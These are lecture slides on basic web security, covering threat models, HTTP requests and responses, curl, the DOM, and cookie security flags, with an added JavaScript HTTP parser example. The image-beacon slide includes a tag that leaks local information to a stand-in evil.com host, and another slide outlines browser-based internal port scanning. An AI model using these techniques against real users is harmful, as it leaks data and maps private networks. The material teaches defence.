Basic Web Security Model

CSE484/CSE584 Basic Web Security Model
Dr. Benjamin Livshits

Web Security: three attackers (figure: each attacker versus Alice)
- Web Attacker: sets up a malicious site visited by the victim; no control of the network
- Network Attacker: intercepts and controls network communication
- Malware Attacker: escapes the browser to wreak havoc on Alice's machine

Web Threat Models
- Web attacker
  - Controls https://attacker.com
  - Can obtain an SSL/TLS certificate for https://attacker.com
  - User visits attacker.com (or runs the attacker's Facebook app, etc.)
- Network attacker
  - Passive: wireless eavesdropper
  - Active: evil router, DNS poisoning
- Malware attacker
  - Attacker escapes the browser isolation mechanisms and runs separately under control of the OS
  - This is what connects the world of web attacks to the low-level memory-based exploitation we have seen so far

Goals of Web Security
- Safely browse the web
  - Users should be able to visit a variety of web sites without incurring harm:
    - No stolen information such as login credentials or cookies
    - Site A cannot compromise the session at Site B
- Support secure web applications
  - Applications delivered over the web should have the same security properties we require for stand-alone applications
  - Maybe even better properties, because most web applications enjoy the protection provided by memory-safe languages
  - (We will see a lot of Java, PHP and JavaScript, but not C or C++)

Looking Ahead
- HTTP
- Communication
- Rendering content
- Navigation
- Cookies
- Security user interface
- Isolation
- Frames and frame busting

HTTP

URLs or URIs
- Global identifiers of network-retrievable documents
- Example: https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule
  - Protocol: https
  - Hostname: courses.cs.washington.edu
  - Port: 80
  - Path: /courses/cse484/14au/
  - Fragment: #schedule
- Special characters are encoded as hex: %0A = newline; %20 or + = space; %2B = + (special exception)

Short and Long URLs (slide 10)
- Bit.ly: http://bit.ly/1vEIGks
- http://longurlmaker.com: http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX… (the generated URL continues for several more lines of filler text, omitted here)
HTTP Request
- Parts: method, file, HTTP version, headers, a blank line, then data (none for GET)

    GET /index.html HTTP/1.1
    Accept: image/gif, image/x-bitmap, image/jpeg, */*
    Accept-Language: en
    Connection: Keep-Alive
    User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
    Host: www.example.com
    Referer: http://www.google.com?q=dingbats
    (blank line)

- GET: no side effect
- POST: possible side effect

POST (slide 12)

    POST /pass.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer: http://127.0.0.1/pass.php
    Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 30

    username=zurfyx&pass=password

Automation with CURL (slide 13)

    curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi
    curl --data-urlencode "name=I am Daniel" http://www.example.com

- Submit/POST binary data to a URL:

    curl -X POST --data-binary @myfile.bin http://foo.com

HTTP Response
- Parts: HTTP version, status code, reason phrase, headers, data

    HTTP/1.0 200 OK
    Date: Sun, 21 Apr 1996 02:20:42 GMT
    Server: Microsoft-Internet-Information-Server/5.0
    Connection: keep-alive
    Content-Type: text/html
    Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
    Set-Cookie: …                      (cookies: see later)
    Content-Length: 2543

    <HTML> Some data... blah, blah, blah </HTML>
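The request and response layouts on the slides above, as an added example that is not part of the lecture: a small parser written for this page in JavaScript (runs under Node). It splits the start line, headers, blank line and body, enforces Content-Length, and decodes a form body using the URL slide's rule that "+" is a space while "%2B" is a literal "+". The sample request is constructed from the POST slide with most headers trimmed; all function names are this example's own.

```javascript
// Added example (not from the lecture): a minimal parser for the raw HTTP/1.1
// request and response messages on the slides above. It splits start line,
// headers, blank line and body, enforces Content-Length, and decodes a form
// body with the URL slide's rule that "+" is a space but "%2B" is a literal "+".
// ASCII only; chunked bodies, header folding and UTF-8 escapes are out of scope.

// Split the head (start line + headers) from the body at the first blank line.
function splitMessage(raw) {
  const text = raw.replace(/\r\n/g, '\n');               // accept CRLF or bare LF
  const sep = text.indexOf('\n\n');
  if (sep < 0) throw new Error('no blank line between headers and body');
  const lines = text.slice(0, sep).split('\n');
  return { startLine: lines[0], headerLines: lines.slice(1), body: text.slice(sep + 2) };
}

// Header names are case-insensitive; a repeated header keeps its last value.
function parseHeaders(headerLines) {
  const headers = {};
  for (const line of headerLines) {
    const colon = line.indexOf(':');
    if (colon < 1) throw new Error('malformed header line: ' + JSON.stringify(line));
    headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return headers;
}

// Content-Length must match the body exactly: shorter means a truncated message,
// longer means bytes that belong to some other message.
function checkBody(headers, body) {
  if (!('content-length' in headers)) return body;
  const declared = Number(headers['content-length']);
  if (!Number.isInteger(declared) || declared < 0) throw new Error('bad Content-Length');
  if (body.length !== declared) throw new Error(`body has ${body.length} bytes, Content-Length says ${declared}`);
  return body;
}

// "Cookie: a=1; b=2"  ->  { a: '1', b: '2' }
function parseCookieHeader(value) {
  const cookies = {};
  for (const part of value.split(';')) {
    const eq = part.indexOf('=');
    if (eq > 0) cookies[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return cookies;
}

// Decode one form-encoded token: "+" -> space, "%XX" -> that byte (so "%2B" -> "+").
function formDecode(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    if (s[i] === '+') { out += ' '; continue; }
    if (s[i] !== '%') { out += s[i]; continue; }
    const hex = s.slice(i + 1, i + 3);
    if (!/^[0-9a-fA-F]{2}$/.test(hex)) throw new Error('bad %-escape at offset ' + i);
    out += String.fromCharCode(parseInt(hex, 16));
    i += 2;
  }
  return out;
}

// "username=zurfyx&pass=password" -> { username: 'zurfyx', pass: 'password' }
function parseForm(body) {
  const fields = {};
  for (const pair of body.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    fields[formDecode(eq < 0 ? pair : pair.slice(0, eq))] = eq < 0 ? '' : formDecode(pair.slice(eq + 1));
  }
  return fields;
}

function parseRequest(raw) {
  const { startLine, headerLines, body } = splitMessage(raw);
  const m = /^([A-Z]+) (\S+) HTTP\/(\d\.\d)$/.exec(startLine);
  if (!m) throw new Error('malformed request line: ' + startLine);
  const headers = parseHeaders(headerLines);
  if (m[3] === '1.1' && !('host' in headers)) throw new Error('HTTP/1.1 request without Host');
  const checked = checkBody(headers, body);
  const isForm = (headers['content-type'] || '').split(';')[0].trim() === 'application/x-www-form-urlencoded';
  return { method: m[1], target: m[2], version: m[3], headers, body: checked,
           cookies: parseCookieHeader(headers.cookie || ''), form: isForm ? parseForm(checked) : null };
}

function parseResponse(raw) {
  const { startLine, headerLines, body } = splitMessage(raw);
  const m = /^HTTP\/(\d\.\d) (\d{3}) ?(.*)$/.exec(startLine);
  if (!m) throw new Error('malformed status line: ' + startLine);
  const headers = parseHeaders(headerLines);
  return { version: m[1], status: Number(m[2]), reason: m[3], headers, body: checkBody(headers, body) };
}

// Constructed sample modelled on the POST slide (headers trimmed; Content-Length
// here is the exact byte count of the body).
const SAMPLE_POST =
  'POST /pass.php HTTP/1.1\r\nHost: 127.0.0.1\r\n' +
  'Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5\r\n' +
  'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n' +
  'username=zurfyx&pass=password';
```

`parseRequest(SAMPLE_POST)` yields the method, target and version from the request line, a lower-cased header map, the two cookies from the Cookie header and the decoded form fields. The strict Content-Length check is the security-relevant part: a parser that silently accepts a longer or shorter body than declared is what makes request smuggling and truncation attacks possible, so the example refuses the message instead of guessing.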
Common HTTP Codes (slide 15)

    200 OK                     401 Unauthorized
    300 Multiple Choices       403 Forbidden
    301 Moved Permanently      404 Not Found
    302 Found                  410 Gone
    304 Not Modified           500 Internal Server Error
    307 Temporary Redirect     501 Not Implemented
    400 Bad Request            503 Service Unavailable
                               550 Permission denied

Browser Tools (slide 16) [figure]

Watch the HTTP Traffic (slide 17) [figure]

HTTP Supports Caching (slide 18) [figure]

And Responses Can Be Interesting (slide 19) [figure]

And Surprising… (slide 20) [figure]

Interacting with Google using CURL (slide 21)

1. Authenticate with Google first

    curl https://www.google.com/accounts/ClientLogin --data-urlencode [email protected] --data-urlencode Passwd=yourpasswd -d accountType=GOOGLE -d source=your.org-your.service-your.service.version -d service=wise

   The response carries the tokens:

    SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX

2. Get your spreadsheets

    curl --silent --header "Authorization: GoogleLogin auth=DQAAANkAXXX" "https://spreadsheets.google.com/feeds/spreadsheets/private/full" | tidy -xml -indent -quiet

3. Get a particular spreadsheet

    curl --silent --header "Authorization: GoogleLogin auth=$AUTH" "https://spreadsheets.google.com/feeds/download/spreadsheets/Export?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t'

Rendering Content

Rendering and Events
- Each browser window or frame…
  - Loads content
  - Renders it
    - Processes HTML and scripts to display the page
    - May involve images, sub-frames, etc.
- Events can be
  - User actions: OnClick, OnMouseover
  - Rendering: OnLoad, OnBeforeUnload
  - Timing: setTimeout(), clearTimeout()
- Each window or frame responds to these events

Connecting it All Together (slide 24) [figure]

Slightly More Complex… (slide 25) [figure]

Document Object Model (DOM)
- Object-oriented interface used to read and write docs
  - A web page in HTML is structured data
  - The DOM provides a representation of this hierarchy
- Includes the Browser Object Model (BOM)
  - window
  - document
  - frames[]
  - history
  - location
  - navigator (type and version of browser)

Deep DOM Trees (slide 27) [figure]

Pre-Year 2000 (slide 28) [frame]

Pre-Year 2000: Functionality Added Via JavaScript (slide 29) [frame]

Changing HTML using JavaScript, DOM
- Some possibilities:
  - createElement(elementName)
  - createTextNode(text)
  - appendChild(newChild)
  - removeChild(node)
- HTML:

    <ul id="t1">
      <li> Item 1 </li>
    </ul>

- Example: add a new list item:

    var list = document.getElementById('t1');      // the <ul> above
    var text = 'Item 2';                            // text for the new item (the slide leaves this variable undeclared)
    var newitem = document.createElement('li');     // new <li> element
    var newtext = document.createTextNode(text);    // a text node: its content is never parsed as markup
    list.appendChild(newitem);
    newitem.appendChild(newtext);

HTML Image Tags (slide 31)

    <html>
    …
    <p> … </p>
    …
    <img src="http://example.com/sunset.gif" height="50" width="100">
    …
    </html>

- Any security issues?
Image Beacons (slide 32)
- Communicate with other sites:

    <img src="http://evil.com/pass-local-information.jpg?extra_information">

- Hide the resulting image:

    <img src=" … " height="1" width="1">

- Spoof other sites: add logos that fool a user

Beacons in Practice (slide 33) [figure]

onError in JavaScript (slide 34)
- Triggered in case of error
- Can register a JavaScript handler:

    <img src="image.gif" onerror="alert('The image couldn\'t be loaded.')">

Port Scanning Behind A Firewall
- JavaScript can:
  - Request images from internal IP addresses, e.g. <img src="192.168.0.4:8080"/>
  - Use timeout/onError to determine success/failure
  - Fingerprint webapps using known image names
- Figure: a browser behind a firewall and a malicious web page on the attacker's server. 1) "show me dancing pigs!" (the browser requests the page); 2) "check this out" (the page is served and its script scans internal hosts from inside the firewall); 3) the port scan results are sent back to the server.

Break… (slide 36)

Cookies: Client State (slide 37)

Cookies: Browser State
- Browser -> Server: POST …
- Server -> Browser, HTTP header:

    Set-cookie: NAME=VALUE ;
        domain = (who can read) ;
        expires = (when expires) ;        if expires=NULL: this session only
        secure = (only over SSL)

- Browser -> Server: POST … with Cookie: NAME = VALUE
- HTTP is a stateless protocol; cookies add state

Cookie-Based Authentication
- Browser -> Web Server: POST login.cgi (username & pwd)
- Web Server -> Auth server: validate user
- Auth server: stores val; -> Web Server: auth=val
- Web Server -> Browser: Set-cookie: auth=val
- Browser -> Web Server: GET restricted.html with Cookie: auth=val
- Web Server -> Auth server: check val (auth=val)
- Auth server -> Web Server: YES/NO
- Web Server -> Browser: if YES, restricted.html

Cookie Security Policy
- Uses:
  - User authentication
  - Personalization
  - User tracking: e.g.
    Doubleclick (3rd party cookies)
- Browser will store:
  - At most 20 cookies/site, 3 KB / cookie
- Origin is the tuple <domain, path>
  - Can set cookies valid across a domain suffix

Cookies From www.marketplace.org (slide 41) [figure]

Secure Cookies
- Browser -> Server: GET …
- Server -> Browser, HTTP header:

    Set-cookie: NAME=VALUE ; Secure=true

- Provides confidentiality against a network attacker
  - Browser will only send the cookie back over HTTPS
- No integrity
  - Can rewrite secure cookies over HTTP
  - A network attacker can rewrite a secure cookie
  - Can log the user into the attacker's account

A Real Secure Set-Cookie Request (slide 43) [figure]

httpOnly Cookies
- Browser -> Server: GET …
- Server -> Browser, HTTP header:

    Set-cookie: NAME=VALUE ; httpOnly

- Cookie is sent over HTTP(S), but not accessible to scripts
  - Cannot be read via document.cookie
- Helps prevent cookie theft via XSS
  - … but does not stop most other risks of XSS bugs
